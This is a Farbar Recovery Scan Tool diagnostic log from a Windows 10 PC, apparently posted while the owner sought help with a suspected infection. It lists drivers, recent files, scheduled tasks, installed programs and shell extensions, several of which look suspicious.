CHR Extension: (Chrome Media Router) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-11-06]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ijahobfejgeblmkpcmgpelfibgnnjpil]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5570712 2019-11-23] (Malwarebytes Inc -> Malwarebytes)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [8192 2016-07-16] (Microsoft Windows -> Windows (R) Win 7 DDK provider)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2018-07-19] (Martin Malik - REALiX -> REALiX(tm))
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [183048 2019-11-23] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [17352 2019-11-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [243800 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [62976 2016-07-16] (Microsoft Windows -> )
R3 rt640x86; C:\Windows\System32\drivers\rt640x86.sys [984264 2019-11-05] (Realtek Semiconductor Corp. -> Realtek )
U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [24688 2019-11-22] (Adlice -> )
R0 trufos; C:\Windows\System32\drivers\trufos.sys [522240 2018-06-28] (Bitdefender SRL -> Bitdefender)
S3 UrsSynopsys; C:\Windows\System32\drivers\urssynopsys.sys [21856 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [119952 2016-07-15] (NGO -> MBB)
R3 wovad_micarray; C:\Windows\system32\drivers\womic.sys [29752 2018-05-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 WUDFWpdMtp; C:\Windows\system32\DRIVERS\WUDFRd.sys [161280 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
U4 dcpsvc; no ImagePath
U4 DiagTrack; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

Error(1) reading file: "C:\Users\Alfredo y Diego\Downloads\Webroot SecureAnywhere AntiVirus 9.0.24.49 "
2019-11-24 07:42 - 2019-11-24 07:44 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\LocalLow\IGDump
2019-11-24 07:41 - 2019-11-24 07:43 - 000019555 _____ C:\Users\Alfredo y Diego\Downloads\FRST.txt
2019-11-24 07:35 - 2019-11-24 07:42 - 000000000 ____D C:\FRST
2019-11-24 07:31 - 2019-11-24 07:31 - 001990144 _____ (Farbar) C:\Users\Alfredo y Diego\Downloads\FRST.exe
2019-11-24 07:24 - 2019-11-24 07:24 - 000243800 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-11-23 22:39 - 2019-11-23 22:39 - 000002659 _____ C:\Users\Alfredo y Diego\Desktop\x.txt
2019-11-23 22:33 - 2019-11-23 22:35 - 000000000 ____D C:\AdwCleaner
2019-11-23 22:32 - 2019-11-23 22:32 - 007622344 _____ (Malwarebytes) C:\Users\Alfredo y Diego\Downloads\adwcleaner_7.4.2.exe
2019-11-23 21:48 - 2019-11-23 21:48 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\cache
2019-11-23 21:47 - 2019-11-23 21:47 - 000183048 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-11-23 21:25 - 2019-11-23 21:25 - 000001009 _____ C:\Users\Alfredo y Diego\Downloads\PCASTLE-malware-removal-script-master.zip
2019-11-23 14:26 - 2019-11-23 22:26 - 000004463 _____ C:\Users\Alfredo y Diego\Desktop\xx.txt
2019-11-23 10:10 - 2019-11-23 10:10 - 000152920 _____ C:\Users\Alfredo y Diego\Documents\cc_20191123_101022.reg
2019-11-23 09:52 - 2019-11-23 09:52 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\mbamtray
2019-11-23 09:52 - 2019-11-23 09:52 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\mbam
2019-11-23 09:51 - 2019-11-23 21:48 - 000002035 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-23 09:51 - 2019-11-23 21:45 - 000129056 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-11-23 09:51 - 2019-11-23 21:45 - 000017352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-11-23 09:51 - 2019-11-23 09:51 - 000000000 ____D C:\Program Files\Malwarebytes
2019-11-23 09:49 - 2019-11-23 09:49 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\Obsidium
2019-11-23 09:44 - 2019-11-23 09:47 - 064941265 _____ C:\Users\Alfredo y Diego\Downloads\KYMBIT38.rar
2019-11-22 22:52 - 2019-11-23 09:51 - 000000000 ____D C:\Windows\ELAMBKUP
2019-11-22 22:52 - 2019-11-22 22:52 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_avusbflt_01011.Wdf
2019-11-22 21:43 - 2019-11-22 21:43 - 000222648 _____ (Malwarebytes) C:\Windows\system32\Drivers\6457D54B.sys
2019-11-22 21:42 - 2019-11-22 23:12 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2019-11-22 21:41 - 2019-11-22 22:23 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\mbar
2019-11-22 20:19 - 2019-11-22 20:19 - 000024688 _____ C:\Windows\system32\Drivers\truesight.sys
2019-11-22 20:06 - 2019-11-22 20:07 - 000213182 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_20.06.33_log.txt
2019-11-22 19:56 - 2019-11-22 19:57 - 000213182 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_19.56.35_log.txt
2019-11-22 19:53 - 2019-11-22 19:53 - 000000000 ____D C:\TDSSKiller_Quarantine
2019-11-22 19:52 - 2019-11-22 19:54 - 000220608 _____ C:\TDSSKiller.3.1.0.28_22.11.2019_19.52.02_log.txt
2019-11-22 19:50 - 2019-11-22 19:51 - 005054744 _____ (AO Kaspersky Lab) C:\Users\Alfredo y Diego\Downloads\tdsskiller.exe
2019-11-22 19:44 - 2019-11-22 19:44 - 000000000 ___HD C:\$SysReset
2019-11-22 19:22 - 2019-11-22 19:35 - 001120256 ____H (Microsoft® Windows® Operating System) C:\Windows\system32\Drivers\taskmgr.exe
2019-11-22 16:56 - 2019-11-22 16:56 - 000066232 _____ C:\ProgramData\agent.uninstall.1574456184.bdinstall.v2.bin
2019-11-22 06:54 - 2019-11-22 06:54 - 000004294 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1533575745
2019-11-22 06:54 - 2019-11-22 06:54 - 000001419 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navegador Opera.lnk
2019-11-21 07:33 - 2019-11-21 19:53 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\Películas
2019-11-20 22:12 - 2019-11-21 11:57 - 000000477 _____ C:\Users\Alfredo y Diego\Desktop\Infravalorado.txt
2019-11-17 00:07 - 2019-11-17 00:07 - 000342329 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Pofad
2019-11-16 01:54 - 2019-11-23 14:52 - 000002472 _____ C:\Windows\system32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B}
2019-11-16 01:48 - 2019-04-15 08:13 - 002856624 _____ (Realtek Semiconductor Corp.) C:\Windows\RtlExUpd.dll
2019-11-15 15:15 - 2019-11-15 15:15 - 000000491 _____ C:\Users\Alfredo y Diego\Downloads\UTC--2019-11-15T19-15-14.896Z--020b87a3590792fc2f5f4b1322adae4fff4b12e4
2019-11-14 09:32 - 2019-11-14 09:32 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\The.Mandalorian.S01.1080p.LakeFilms
2019-11-10 16:05 - 2019-11-16 21:40 - 000000000 ___HD C:\Program Files\Temp
2019-11-10 16:05 - 2019-11-10 16:05 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2019-11-10 10:42 - 2019-11-15 07:57 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\uTorrent
2019-11-09 14:32 - 2019-11-09 14:32 - 000000000 ____D C:\ProgramData\Mozilla
2019-11-07 11:39 - 2019-11-09 07:45 - 000000000 ____D C:\Users\Alfredo y Diego\Documents\Lightshot
2019-11-06 17:22 - 2019-11-06 17:32 - 365981740 _____ C:\Users\Alfredo y Diego\Downloads\2015.zip
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-sys.job
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job
2019-11-06 06:04 - 2019-11-23 14:50 - 000003120 _____ C:\Windows\system32\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001
2019-11-06 06:04 - 2019-11-23 14:50 - 000002868 _____ C:\Windows\system32\Tasks\update-sys
2019-11-06 06:04 - 2019-11-06 06:04 - 000000412 _____ C:\Users\Alfredo y Diego\AppData\Local\UserProducts.xml
2019-11-06 06:03 - 2019-11-06 06:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2019-11-06 06:03 - 2019-11-06 06:03 - 000000000 ____D C:\Program Files\Skillbrains
2019-11-06 00:07 - 2019-11-06 00:07 - 000147253 _____ C:\Users\Alfredo y Diego\AppData\Roaming\Kekugopom
2019-11-05 21:10 - 2019-11-05 21:10 - 000984264 _____ (Realtek ) C:\Windows\system32\Drivers\rt640x86.sys
2019-11-05 21:05 - 2019-11-05 21:05 - 000073764 _____ C:\ProgramData\agent.update.1573002209.bdinstall.v2.bin

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 07:26 - 2018-11-12 00:35 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\Telegram Desktop
2019-11-24 07:24 - 2018-07-19 01:38 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-23 23:53 - 2018-07-19 01:48 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\ClassicShell
2019-11-23 22:48 - 2018-12-26 23:38 - 000002071 _____ C:\Users\Alfredo y Diego\Desktop\FL Studio 12 (32bit).lnk
2019-11-23 22:48 - 2018-12-03 14:21 - 000001052 _____ C:\Users\Alfredo y Diego\Desktop\HandBrake.lnk
2019-11-23 22:48 - 2018-10-14 18:47 - 000001032 _____ C:\Users\Alfredo y Diego\Desktop\WO Mic Client.lnk
2019-11-23 22:48 - 2018-08-31 08:01 - 000002536 _____ C:\Users\Alfredo y Diego\Desktop\BitShares.lnk
2019-11-23 22:48 - 2018-08-24 01:46 - 000001161 _____ C:\Users\Alfredo y Diego\Desktop\MEGAsync.lnk
2019-11-23 22:48 - 2018-08-12 22:37 - 000001199 _____ C:\Users\Alfredo y Diego\Desktop\PotPlayer.lnk
2019-11-23 22:48 - 2018-08-06 13:15 - 000001400 _____ C:\Users\Alfredo y Diego\Desktop\Navegador Opera.lnk
2019-11-23 22:48 - 2018-07-19 03:27 - 000002023 _____ C:\Users\Alfredo y Diego\Desktop\CrystalDiskInfo.lnk
2019-11-23 22:41 - 2018-08-22 17:18 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\IObit
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\ProgramData\IObit
2019-11-23 22:23 - 2018-11-11 20:10 - 000000000 ____D C:\Users\Alfredo y Diego\Downloads\Telegram Desktop
2019-11-23 22:17 - 2018-07-19 01:35 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-23 20:36 - 2018-11-10 23:44 - 000004210 _____ C:\Windows\system32\Tasks\CCleaner Update
2019-11-23 20:25 - 2018-07-19 01:45 - 000000000 ____D C:\Users\Alfredo y Diego
2019-11-23 14:50 - 2018-11-10 23:44 - 000002278 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC
2019-11-23 09:35 - 2018-08-15 13:48 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-23 02:50 - 2018-11-10 22:07 - 000000000 ____D C:\ProgramData\{2F4FEA2C-A50D-60EA-23CB-FEA8B9897566}
2019-11-22 22:23 - 2018-11-10 22:07 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\Dekitim
2019-11-22 19:03 - 2018-09-23 16:32 - 000000000 ___RD C:\Windows\MiracastView
2019-11-22 17:42 - 2018-08-13 14:27 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Local\ElevatedDiagnostics
2019-11-22 16:55 - 2018-11-10 23:43 - 000000000 ____D C:\Program Files\CCleaner
2019-11-22 16:49 - 2018-07-19 02:04 - 000000000 ____D C:\ProgramData\ProductData
2019-11-22 15:40 - 2016-07-16 04:28 - 000000000 ____D C:\Windows\INF
2019-11-21 18:23 - 2018-07-19 02:28 - 000002253 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-21 18:23 - 2018-07-19 02:28 - 000002212 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-21 10:07 - 2018-07-19 02:37 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\foobar2000
2019-11-20 11:44 - 2016-07-15 22:22 - 000008192 _____ C:\Windows\system32\config\BBI
2019-11-18 10:05 - 2018-08-29 19:15 - 000000000 ____D C:\Users\Alfredo y Diego\Desktop\mkvtoolnix
2019-11-18 00:07 - 2018-11-11 00:07 - 000000425 _____ C:\Users\Alfredo y Diego\AppData\Roaming\WB.CFG
2019-11-16 17:16 - 2018-07-19 02:03 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\LocalLow\Mozilla
2019-11-12 23:09 - 2018-07-19 02:33 - 000000000 ____D C:\Windows\system32\RTCOM
2019-11-10 07:34 - 2016-07-16 04:29 - 000000000 ____D C:\Windows\system32\FxsTmp
2019-11-10 04:32 - 2018-09-27 20:24 - 000000000 ____D C:\Windows\pss
2019-11-09 16:42 - 2018-07-19 02:02 - 000000000 ____D C:\Program Files\Mozilla Maintenance Service
2019-11-09 16:42 - 2018-07-19 02:02 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-09 14:32 - 2018-07-19 02:02 - 000001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-11-06 10:02 - 2018-07-19 01:45 - 000000000 __RHD C:\Users\Public\AccountPictures
2019-11-05 21:22 - 2018-07-19 02:28 - 000003546 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-05 21:22 - 2018-07-19 02:28 - 000003422 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-05 21:20 - 2018-07-19 02:28 - 000000000 ____D C:\Program Files\Google

==================== Files in the root of some directories ========

2019-11-06 00:07 - 2019-11-06 00:07 - 000147253 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Kekugopom
2019-11-17 00:07 - 2019-11-17 00:07 - 000342329 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Pofad
2019-07-29 02:05 - 2019-07-29 02:05 - 000361684 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\Tapufeha
2018-11-11 00:07 - 2019-11-18 00:07 - 000000425 _____ () C:\Users\Alfredo y Diego\AppData\Roaming\WB.CFG
2018-07-20 06:06 - 2018-07-20 06:06 - 000007601 _____ () C:\Users\Alfredo y Diego\AppData\Local\Resmon.ResmonCfg
2019-11-06 06:04 - 2019-11-06 06:04 - 000000003 _____ () C:\Users\Alfredo y Diego\AppData\Local\updater.log
2019-11-06 06:04 - 2019-11-06 06:04 - 000000412 _____ () C:\Users\Alfredo y Diego\AppData\Local\UserProducts.xml

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2019-11-22 07:07
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 23-11-2019
Ran by Alfredo y Diego (24-11-2019 07:44:47)
Running from C:\Users\Alfredo y Diego\Downloads
Microsoft Windows 10 Enterprise 2016 LTSB Version 1607 (X86) (2018-07-19 05:44:33)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-1270689601-2402022770-626450427-500 - Administrator - Disabled)
Alfredo y Diego (S-1-5-21-1270689601-2402022770-626450427-1001 - Administrator - Enabled) => C:\Users\Alfredo y Diego
DefaultAccount (S-1-5-21-1270689601-2402022770-626450427-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-1270689601-2402022770-626450427-1000 - Limited - Disabled) => C:\Users\defaultuser0
Invitado (S-1-5-21-1270689601-2402022770-626450427-501 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 30 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 30.0.0.154 - Adobe Systems Incorporated)
Adobe Flash Player 31 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 31.0.0.108 - Adobe Systems Incorporated)
ASIO4ALL (HKLM\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
BitShares 2.0.180815 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\55efd047-5d18-54f5-be19-affeff8cc8e9) (Version: 2.0.180815 - Sigve Kvalsvik)
BitShares 2.0.180815 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\55efd047-5d18-54f5-be19-affeff8cc8e9) (Version: 2.0.180815 - Sigve Kvalsvik)
BitTorrent (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\BitTorrent) (Version: 7.10.5.45272 - BitTorrent Inc.)
BitTorrent (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\BitTorrent) (Version: 7.10.5.45374 - BitTorrent Inc.)
Byteball version 2.4.1 (HKLM\...\Byteball_is1) (Version: 2.4.1 - Byteball)
CCleaner (HKLM\...\CCleaner) (Version: 5.48 - Piriform)
Classic Shell (HKLM\...\{8A99142D-5D6E-40B6-AF88-8BD46F0C5CB4}) (Version: 4.3.1 - IvoSoft)
CrystalDiskInfo 7.6.1 (HKLM\...\CrystalDiskInfo_is1) (Version: 7.6.1 - Crystal Dew World)
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
FL Studio 12 (HKLM\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
foobar2000 v1.3.19 (HKLM\...\foobar2000) (Version: 1.3.19 - Peter Pawlowski)
Google Chrome (HKLM\...\Google Chrome) (Version: 78.0.3904.108 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
HandBrake 1.0.7 (HKLM\...\HandBrake) (Version: 1.0.7 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
IL Download Manager (HKLM\...\IL Download Manager) (Version:  - Image-Line)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Lightshot-5.5.0.4 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.5.0.4 - Skillbrains)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
MEGAsync (HKLM\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40649 (HKLM\...\{35b83883-40fa-423c-ae73-2aff7e1ea820}) (Version: 12.0.40649.5 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Mozilla Firefox 68.2.0 ESR (x86 es-ES) (HKLM\...\Mozilla Firefox 68.2.0 ESR (x86 es-ES)) (Version: 68.2.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.2.0.7228 - Mozilla)
Native Instruments Massive (HKLM\...\Native Instruments Massive) (Version: 1.5.1.637 - Native Instruments)
Opera Stable 64.0.3417.92 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
Opera Stable 65.0.3467.48 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Opera 65.0.3467.48) (Version: 65.0.3467.48 - Opera Software)
PotPlayer (HKLM\...\PotPlayer) (Version: 1.7.13622 - Kakao Corp.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8409 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Sophos Home (HKLM\...\Sophos Endpoint Agent) (Version: 1.3.3 - Sophos Limited)
SoulseekQt versión 2017.2.20 (HKLM\...\{8A4E1646-488C-4E5B-AC31-F784400E8D2D}_is1) (Version: 2017.2.20 - Soulseek LLC)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Warcraft III: All Products (HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Warcraft III) (Version:  - )
Warcraft III: All Products (HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Warcraft III) (Version:  - )
WinRAR 5.50 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
WO Mic Client (HKLM\...\WOMic) (Version:  - )

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\64.0.3417.92\notification_helper.exe (Opera Software AS -> The Chromium Authors)
CustomCLSID: HKU\S-1-5-21-1270689601-2402022770-626450427-1001_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\65.0.3467.48\notification_helper.exe (Opera Software AS -> The Chromium Authors)
ShellServiceObjects: No Name -> {872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac} => 
ShellServiceObjects: No Name -> {900c0763-5cad-4a34-bc1f-40cd513679d5} => 
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-23] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [StartMenuExt] -> {E595F05F-903F-4318-8B0A-7F633B520D2B} => C:\Windows\system32\StartMenuHelper32.dll [2017-08-13] (Ivaylo Beltchev -> IvoSoft) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [msacm.vorbis] => C:\Windows\system32\vorbis.acm [1456448 2016-11-02] (Image Line -> HMS hxxp://hp.vector.co.jp/authors/VA012897/) [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2017-10-18 17:58 - 2017-10-18 17:58 - 000570368 _____ () [File not signed] C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll
2017-08-13 08:49 - 2017-08-13 08:49 - 003239736 _____ (Ivaylo Beltchev -> IvoSoft) [File not signed] C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll
2016-07-16 04:25 - 2016-07-16 04:25 - 000226304 _____ (Microsoft Corporation) [File not signed] C:\Windows\System32\container.dll
2016-07-16 04:25 - 2017-11-28 18:19 - 000067584 _____ (Microsoft Corporation) [File not signed] C:\Windows\system32\UXINIT.dll
2016-07-16 04:25 - 2017-11-28 18:19 - 000479232 _____ (Microsoft Corporation) [File not signed] C:\Windows\system32\UxTheme.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\77576241.sys => ""="Driver"
